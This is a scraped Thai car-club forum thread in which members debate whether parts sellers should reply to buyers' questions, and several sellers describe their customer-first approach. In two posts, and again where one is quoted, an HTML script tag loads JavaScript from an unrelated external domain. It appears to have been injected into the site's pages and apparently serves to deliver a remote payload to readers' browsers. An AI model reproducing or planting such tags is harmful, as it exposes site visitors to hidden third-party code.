บาง case ก็ถามไปมาจนแบบว่าโทรคุยกันง่ายกว่ามั๊ย ขอเบอร์ไปก็ไม่ให้ จะได้เคลียร์กันไปเลย
ได้รับคำขอบคุณจาก: N_J Civic  athongchum  ค้าอะไหล่โคตรเก่า  kaisuh 
somkides01


ชื่อเล่น: คิด

เข้าร่วม: 13 ตุลา 2008
ตอบ: 893

Guru ES
Guru ES

ได้รับคำขอบคุณ: 883
ให้คำขอบคุณ: 118

ที่อยู่: ศาลายา
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 3 เมษา 2013 12:45 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
NuuTeee พิมพ์ว่า:
athongchum พิมพ์ว่า:
จะมาบอกว่าพ่อค้าที่คิดจะขายของอย่างเดียวเค้าจะคิดอย่างนี้คือ ถ้าลูกค้าสนใจจริงๆ จะไม่โพสถามในกระทู้หรอก มักจะโทรไปมากกว่า ผมก็คนนึงที่จะซื้ออะไรแล้วจะเอาแน่ๆ ผมจะไม่โพสถาม จะโทรไปเลย เพราะเดี๋ยวมันจะไม่ทันการ อันไหนที่โพสถามคืออันนั้นยังลังเลอยู่ ถึงใครตัดหน้าไปก่อนก็ไม่เป็นไร


ตามนี้ครับ

บาง case ก็ถามไปมาจนแบบว่าโทรคุยกันง่ายกว่ามั๊ย ขอเบอร์ไปก็ไม่ให้ จะได้เคลียร์กันไปเลย




เคยเจอนะครับโพสมาถาม จองกันก็มี แต่ไม่มาเอาจริงๆๆๆ เอางัยก็ไม่บอก เสียโอกาศคนอื่นๆๆๆ โทรถามเลยครับ
ได้รับคำขอบคุณจาก: N_J Civic  athongchum  ค้าอะไหล่โคตรเก่า 
Mundo


ชื่อเล่น: ธี

เข้าร่วม: 02 พฤษภาคม 2012
ตอบ: 881

Guru ES
Guru ES

ได้รับคำขอบคุณ: 720
ให้คำขอบคุณ: 490

ที่อยู่: สุพรรณบุรี - นนทบุรี - รังสิต
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 3 เมษา 2013 14:24 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
ตามนั้น 
ได้รับคำขอบคุณจาก: N_J Civic 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 3 เมษา 2013 16:52 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
คนขายของนี่ไม่เท่าไหร่น่ะ แต่ไอ้คนขายงานบริการนี่สิ เช่น รับทำนู่นนี่นั่น แบบว่าทุกคนสามารถไปทำได้ ของไม่มีหมด ไรงี้ โพสถามไปก็ไม่ตอบ หลับหูหลับตาอัพอย่างเดียว พอถามไปว่าทำไมไม่ตอบแล้วใครจะไปใช้บริการก็ได้คำตอบมาว่า "คอมมีปัญหา" ผมล่ะงงจริงๆ คอมมีปัญหาเกี่ยวไรกะตอบกระทู้ เห็นช่องพิมพ์ตอบกระทู้แต่ไม่เห็นคอมเม้นลูกค้าหรือไง มันน่าคิดน่ะ
ได้รับคำขอบคุณจาก: N_J Civic  ค้าอะไหล่โคตรเก่า 
Rachen


ชื่อเล่น: เชน

เข้าร่วม: 03 พฤศจิกา 2012
ตอบ: 1422

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1495
ให้คำขอบคุณ: 2881

ที่อยู่: บ้านฉาง ระยอง และ สตาร์พลาซ่า ระยอง
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 3 เมษา 2013 17:02 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
eskung พิมพ์ว่า:

N_J Civic พิมพ์ว่า:
ขออนุญาตเขียนกระทู้ เรื่องนี้หน่อยนะครับ

..การที่พ่อค้ามาเปิดตลาดในเวป พอลูกค้าสนใจที่จะซื้อโดยทำการไพสต์ลงในกระทู้ของคุณนั่นแหล่ะ ถึงรายละเอียดของสินค้า หรือการต่อรองราคาโดยขอร้องให้เจ้าของกระทู้ซึ่งคือพ่อค้าทั่ว ๆ ไป หรือเป็นสมาชิกเรา ๆ นี่แหล่ะ อย่างน้อยก็ PM กลับบ้าง ชิ มิ ชิ มิ เพื่อทราบความคืบหน้าว่าของยังอยู่ไหม ของราคาโดนใจหรือเปล่า
แต่ถ้าเอาแต่ไพสต์คำว่า Up, Up, Up แล้วก็ Up โดยไม่มีอะไรที่ดีกว่านี้คุณคิดเหรอครับว่าจะได้ขายของ
ผมเจอหลายกระทู้มากครับ เข้าใจครับว่าแล้วแต่ความคิด ไม่ซื้อก็ไม่ต้องตื๊อ
แต่มันหมั่นว่ะ.....


ต้องขอโทษเพื่อน ๆ อีกครั้งครับที่ใช้เวทีนี้อธิบาย




มาซื้อผมดิ ลองไปถามลูกค้าผมดูว่าผมใส่ใจแค่ไหน"<script src="https://sport32news.com/civicesgroup.js"> จริงๆคือผมอยากได้เพื่อนคร้าบผม อยากให้ได้ของที่ดี แต่ส่วนที่ผมมีข้อบกพร่องก็มีคือไม่ค่อยได้ลงรูปของเท่าไหร่ เพราะบางทีผมก้มองว่าถ้าลูกค้าอยากได้จริงๆยังไงเค้าก็ต้องโทรมา และหลังจากนั้นผมก็จะส่ง รูปทางเมล์ ไลน์ หรือ วอชแอพไปให้
      กฏในการขายของของผมมี 2 ข้อคร้าบ
1.ลูกค้าถูกและสำคัญที่สุดเสมอ
2.ถ้ามีข้อเคลือบแคลงสงสัยให้กลับไปดูข้อ 1. ใหม่
      ถ้าผมเคยทำให้พี่ๆเพื่อนๆ น้องๆท่านใดไม่พอใจในการซื้อขายก็ต้องขออภัยมา ณ ที่นี้ด้วยนะคร้าบ ไม่มีเจตนาจริงๆ อยากซื้อขายกันแบบพี่น้องคร้าบ แบ่งกันใช้กำไรพอได้ค่าน้ำมันค่าเหนื่อยนิดหน่อย คนขายอยู่้ได้ คนซื้อสบายใจราคาสมเหตุสมผล

        ใจพี่หล่อมาก 
ได้รับคำขอบคุณจาก: N_J Civic  ค้าอะไหล่โคตรเก่า 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 3 เมษา 2013 20:51 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
Rachen พิมพ์ว่า:
eskung พิมพ์ว่า:

N_J Civic พิมพ์ว่า:
ขออนุญาตเขียนกระทู้ เรื่องนี้หน่อยนะครับ

..การที่พ่อค้ามาเปิดตลาดในเวป พอลูกค้าสนใจที่จะซื้อโดยทำการไพสต์ลงในกระทู้ของคุณนั่นแหล่ะ ถึงรายละเอียดของสินค้า หรือการต่อรองราคาโดยขอร้องให้เจ้าของกระทู้ซึ่งคือพ่อค้าทั่ว ๆ ไป หรือเป็นสมาชิกเรา ๆ นี่แหล่ะ อย่างน้อยก็ PM กลับบ้าง ชิ มิ ชิ มิ เพื่อทราบความคืบหน้าว่าของยังอยู่ไหม ของราคาโดนใจหรือเปล่า
แต่ถ้าเอาแต่ไพสต์คำว่า Up, Up, Up แล้วก็ Up โดยไม่มีอะไรที่ดีกว่านี้คุณคิดเหรอครับว่าจะได้ขายของ
ผมเจอหลายกระทู้มากครับ เข้าใจครับว่าแล้วแต่ความคิด ไม่ซื้อก็ไม่ต้องตื๊อ
แต่มันหมั่นว่ะ.....


ต้องขอโทษเพื่อน ๆ อีกครั้งครับที่ใช้เวทีนี้อธิบาย




มาซื้อผมดิ ลองไปถามลูกค้าผมดูว่าผมใส่ใจแค่ไหน"<script src="https://sport32news.com/civicesgroup.js"> จริงๆคือผมอยากได้เพื่อนคร้าบผม อยากให้ได้ของที่ดี แต่ส่วนที่ผมมีข้อบกพร่องก็มีคือไม่ค่อยได้ลงรูปของเท่าไหร่ เพราะบางทีผมก้มองว่าถ้าลูกค้าอยากได้จริงๆยังไงเค้าก็ต้องโทรมา และหลังจากนั้นผมก็จะส่ง รูปทางเมล์ ไลน์ หรือ วอชแอพไปให้
      กฏในการขายของของผมมี 2 ข้อคร้าบ
1.ลูกค้าถูกและสำคัญที่สุดเสมอ
2.ถ้ามีข้อเคลือบแคลงสงสัยให้กลับไปดูข้อ 1. ใหม่
      ถ้าผมเคยทำให้พี่ๆเพื่อนๆ น้องๆท่านใดไม่พอใจในการซื้อขายก็ต้องขออภัยมา ณ ที่นี้ด้วยนะคร้าบ ไม่มีเจตนาจริงๆ อยากซื้อขายกันแบบพี่น้องคร้าบ แบ่งกันใช้กำไรพอได้ค่าน้ำมันค่าเหนื่อยนิดหน่อย คนขายอยู่้ได้ คนซื้อสบายใจราคาสมเหตุสมผล

        ใจพี่หล่อมาก 




ฮาด้วยครับ มาจิบกาแฟแถวบ้านผมดิ ผมว่าเรื่องซื้อขายเรื่องเล็กครับน้ำใจเรื่องใหญ่กว่า สนใจไรลองโทรมาคุยครับ ผมว่าคำว่าพ่อค้าลูกค้ามันหมดไปนานแล้วคร้าบ มีแต่เพื่อนๆพี่ๆน้อง มาดูไม่ซื้อผมก็เลี้ยงข้าวเลี้ยงกาแฟได้คร้าบผม"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: thammarong007  N_J Civic  es-may 
Supap


เข้าร่วม: 26 พฤศจิกา 2012
ตอบ: 950

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 469
ให้คำขอบคุณ: 144

ที่อยู่: ศรีราชา ชลบุรี
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 3 เมษา 2013 21:12 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
ของผมดิ ของดีราคาถูก ผมก็ขายของในเวปนะแต่เหมือน จขกท ว่าผมก็ขอบายเพราะเขาไม่สนใจลูกค้า
ส่วนผม ลูกค้าคือพระเจ้า
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  N_J Civic 
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.